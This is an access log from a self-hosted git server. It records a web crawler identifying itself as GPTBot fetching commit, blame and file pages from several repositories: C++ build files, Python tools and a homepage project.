[Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" +[17/Feb/2026:15:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" +[17/Feb/2026:15:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log?display=rendered" [Client 74.7.227.38] [Length 10989] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" +[17/Feb/2026:15:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:15:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fmain.py" [Client 74.7.227.38] [Length 22082] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" +[17/Feb/2026:15:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13162] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" +[17/Feb/2026:15:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 18213] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:15:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 10370] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" +[17/Feb/2026:15:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 10345] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" +[17/Feb/2026:15:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:15:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts?display=source" [Client 74.7.227.38] [Length 11501] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" +[17/Feb/2026:15:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11474] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" +[17/Feb/2026:15:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18918] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" +[17/Feb/2026:15:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18917] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" +[17/Feb/2026:15:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10709] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10704] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10464] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10461] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:15:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:15:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fobj%2fproject.assets.json" [Client 74.7.227.38] [Length 20732] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:15:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10463] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25011] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25008] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10410] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10409] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10205] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10208] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:15:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fwatchdog_final_debug.spec" [Client 74.7.227.38] [Length 21787] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:15:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full" [Client 74.7.227.38] [Length 31114] [Gzip 6.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fenv.example.txt" [Client 74.7.227.38] [Length 21761] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" +[17/Feb/2026:15:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9877] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9877] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9877] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9876] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9877] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:24:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:15:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:15:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 20828] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24289] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11310] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24288] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24290] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11312] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11310] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 11944] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:15:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12544] 